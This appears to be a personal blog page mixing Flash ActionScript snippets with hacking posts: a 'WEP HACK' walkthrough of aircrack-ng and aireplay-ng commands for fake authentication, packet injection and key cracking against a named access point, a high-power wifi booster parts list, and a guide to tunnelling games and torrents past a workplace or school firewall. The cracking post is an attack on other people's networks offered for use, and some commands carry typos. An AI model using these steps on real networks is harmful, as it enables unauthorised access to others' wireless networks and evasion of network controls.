Flash player h.264 detection script
Does what it says on the label, Adobe has introduced h.264 codec inside Flash Player 9 Update 3 (v 9.0.115.0) this script detects if you have below that version installed/or flsh player 10 in that case wont matter (i hope, haha). //Flash player h.264 detection script// //Flash Player 9 Update 3 (v 9.0.115.0)//
res.text += '///// h.264 detection script ///// \n\n';
//dissection fpv = System.capabilities.version.split(" "); fpvArray = fpv[1].split(","); fpvCurrent = Number(fpvArray[0]+"."+fpvArray[1]); fpvBuild = Number(fpvArray[2]);
//results trace('flash player settings\n --- \nfpv full version = '+fpv+'\nfpv current = '+fpvCurrent+'\nfpv build = '+fpvBuild+' \n\n'); res.text += 'flash player settings\n --- \nfpv full version = '+fpv+'\nfpv current = '+fpvCurrent+'\nfpv build = '+fpvBuild+' \n\n';
function fpvXcheck(){ res.text += 'run detection\n --- \n'; trace('run detection\n---'); //fpvX version check? fpvX = 10; // if (fpvCurrent>=fpvX) { trace('flash player('+fpvX+') detected h.264 supported.'); res.text += 'flash player('+fpvX+') detected h.264 supported.'; } else { trace('flash playerX not installed, run flash9 check?'); res.text += 'flash playerX not installed, run flash9 check?'; checkCurrent(); } } fpvXcheck();
function checkCurrent() { //checkCurrent if (fpvCurrent == "9") { trace('\nfpv current('+fpvCurrent+') = installed'); res.text += '\nfpv current('+fpvCurrent+') = installed'; checkBuild(); } else { trace('\nfpv current('+fpvCurrent+') = incorrect, please update flash player v(9.0.115.0) or higher. \n'); res.text += '\nfpv current('+fpvCurrent+') = incorrect, please update flash player v(9.0.115.0) or higher. \n'; } }
function checkBuild() { //checkBuild if (fpvBuild>=115) { trace('\nfpv build('+fpvBuild+') = correct \n\n*successful! flash player supports h.264'); res.text += '\nfpv build('+fpvBuild+') = correct \n\n*successful! flash player supports h.264'; } else { trace('\nfpv build('+fpvBuild+') = incorrect version, please update flash player v(9.0.115.0) or higher. \n\n*sorry! flash player doesnt support h.264'); res.text += '\nfpv build('+fpvBuild+') = incorrect version, please update flash player v(9.0.115.0) or higher. \n\n*sorry! flash player doesnt support h.264'; } }
//end Labels: action script, adobe, as, detection, flash, flash player, h.264, macromedia, script
USSR Torrent - Seeders of the World Unite+
Just launched a torrent website called: USSR 'union of shared socialist resources, signup for FREE! to start downloading torents/uploading them (just ironing out a few bugs ATM email any errors to kurt@l4t3ncy.com) i have already added a few external torrents (linux distros/zombie films) but will be adding a load more of rare files soon. tempary URl/address: http://ussr.l4t3ncy.com//over & out
WEP HACK - revised // wireless booster 5-KM's!!!!++++
WEP HACK (v0.2) This is my newer version/exploration of WEP hacking/cracking this will allow the use of ‘aireplay-ng' to do brute force attack on the AP increasing the speed of cracking the WEP code/IVs sent, by injecting continuous packets directory into the AP, WPA-PSK Hack coming soon :)
01:
-c = channel which target network is transmitting on -w = dump file prefix -i = save only captured IVs *rausb0 = change to your wireless interface name (type 'iwconfig' in new shell to set to monitor mode to enable packet injection).
airodump-ng - c 11 -w wep -i raush0
02:
-1 = fake authentication 0 = reassociation timing in secounds -e = target network essid -a = access point MAC address -h = your cards MAC address
aireplay-ng -1 0 -e ULA_KK -a (their MAC) -h (my MAC) rausb0
03:
-3 = standard arp request replay -b = access point MAC address -h = source MAC address (either an associated client or from fake authentication)
aireplay-ng -3 -b (their MAC) -h (my MAC)
04:
-a = force attack mode 1 = static WEP -0 = apply colors in aircrack -n = specify the length of the key (128 104-bit WEP)
aircrack-ng -a 1 -0 -n 128 wep-01.ivs (chose target)
//end
in the process of making a video/tutorial of how to crack/hack wireless signal.
been researching into building a 5KM wireless signal booster, here is what the built consists of so far:
2 Meter RP-SMA WiFi Extension Lead - HDF400 PRO Range (£19.95) 2x RP SMA Male to N-Type Male Adaptor WiFi WLAN (£2.50) Senao NL-2511 CD PLUS EXT2 200mw 802.11b wireless card - MMCX to SMA pigtail (£24.15) 10 Meter RP-SMA WiFi Extension Lead - HDF400 PRO Range (£29.95) 1000mW / 1Watt WiFi Power Booster indoor/outdoor - N-Female (£149.95) 2.4 GHZ OMNI ANTENNA 22dBI - N-female (£50.00)
Going for a omni directional antenna for (to start off with first prolly only get about 2-3KM's boost) now but looking into putting a 2 way splitter on the booster and having a 30dbm direction motorised 360 digrea dish, for extra coverage, cant wait ;x
you can get everything from eBay for under £300's cant wait to get this baby up and running..
//1NF3C710N.Labels: cracking, flash XML cache hack, hacking, signal booster, wep, wifi, wireless
Proxy bypass via SSH tunneling behind a firewall+
What to? run applications like games and p2p downloaders, behind a wirewall, this will work for: WOW: world of war craft Steam network: css dod hl series etc. bit torrent applications (any client is supported).
All you need! SSH tunneling behind a wirewall, directly connect to a remote proxy server.
I have found some very helpful applications and services to do this, you need...
Service Proxy server/tunneling service (its free for 6 hours thereafter you have to pay well worth it though) - http://www.your-freedom.net.
Software Proxy applications (these programs allow you to tunnel windows applications through HTTP and SOCKS) ProxyCap - http://www.proxycap.com FreeCap - http://www.freecap.ru Proxifier - http://www.proxifier.com Sockscap - http://archive.socks.permeo.com
Setup As far as it goes on 'Your Freedom' proxy servers you will need to.
Steam Go to Preferences -> Proxies: Set up the following options: socks 5, localhost, 1080. Moreover, make sure UDP is ticked.. Then add steam.exe and hl.exe (from your steam folder[s]) and it should work Start your freedom, and open steam via Proxycap (Sockscap).
World of Warcraft 1. You only need one other program other than YF and WoW, this is SocksCap, which used to be available for download from Permeo's web site but is no longer since the company was acquired by Blue Coat. Just google for it. The last released version is 2.40. If you can't find it, send us an email and we'll help you out. 2. Make sure YF is set so that the Socks 4/5 port is enabled and set to 1080 (that's the default) 3. Open up SocksCap, click on File and then go to Settings and make sure the
SOCKS Settings tab looks like this:
With the SOCKS Server set to "localhost" and port set to "1080"
4. Now click on the "New" button on the Sockscap main window, then click on the browse button in the window that comes up. Go to the folder "C:\Program Files\World of Warcraft" (or wherever your WoW folder is stored) and double click on the program called WoW.exe. The Sockscap main window should now look like this:
5. Make sure YF is connected to a European Server if you're playing WoW in Europe, or to an American server if you are playing in America, as this will reduce lag in the game. 6. Once YF is connected, double click on the WoW icon in the main Sockscap window, or click on the WoW icon and then click on the "Run!" button. World of Warcraft will now run and connect to the WoW server when you log in.
More applications and games can be found here, http://www.your-freedom.net/index.php?id=4
by 1NF3C710n / happy hacking cracking!Labels: firewall, proxy, Proxy bypass via SSH tunneling behind a firewall, ssh, ssh tunneling, steam, wow
Wireless Hacking+
Anyone interested in wireless hacking/cracking I have recently written a pretty comprehensive guide on the subject, very easy to use step-by-step walkthrough. Get your copy here: click hereI’m writing a new version of the guide which will include an example of using backtrack 2 within windows (xp/vista) shell, so no need to boot into linux this will save time and money (instead of getting money on expensive airpcap adapters). Watch this space!
Adobe Flash Media Interactive Server 3 - out now
Flash Buttons! (inc, new AS3 version).
Here are a few different ways of implementing a button within flash using as code/button. basically all you need to do is drop or create a button on your main timeline. Then see the code sniplet examples below: //as code //AS1 version, click onto the button then add code onto it. on(release){ trace("as1Btn - clicked"); } //This will work with AS1, but will need to add an instance name to the button. as1Btn.onRelease = function(){ trace("as2Btn - clicked"); }
//AS2 version, add your button to the stage then give your button an instance name 'as2Btn' then add this sniplet anywhere on your main timeline. as2Btn.onRelease = function():Void { trace("as2Btn - clicked"); }
//AS3 version, same as above basically. as3Btn.addEventListener(MouseEvent.MOUSE_DOWN,pressBtn); function pressBtn(event:MouseEvent){ trace("as3Btn - clicked"); }
Labels: action script, as1, as2, as3, buttons, Encrypt Flash
|
|
|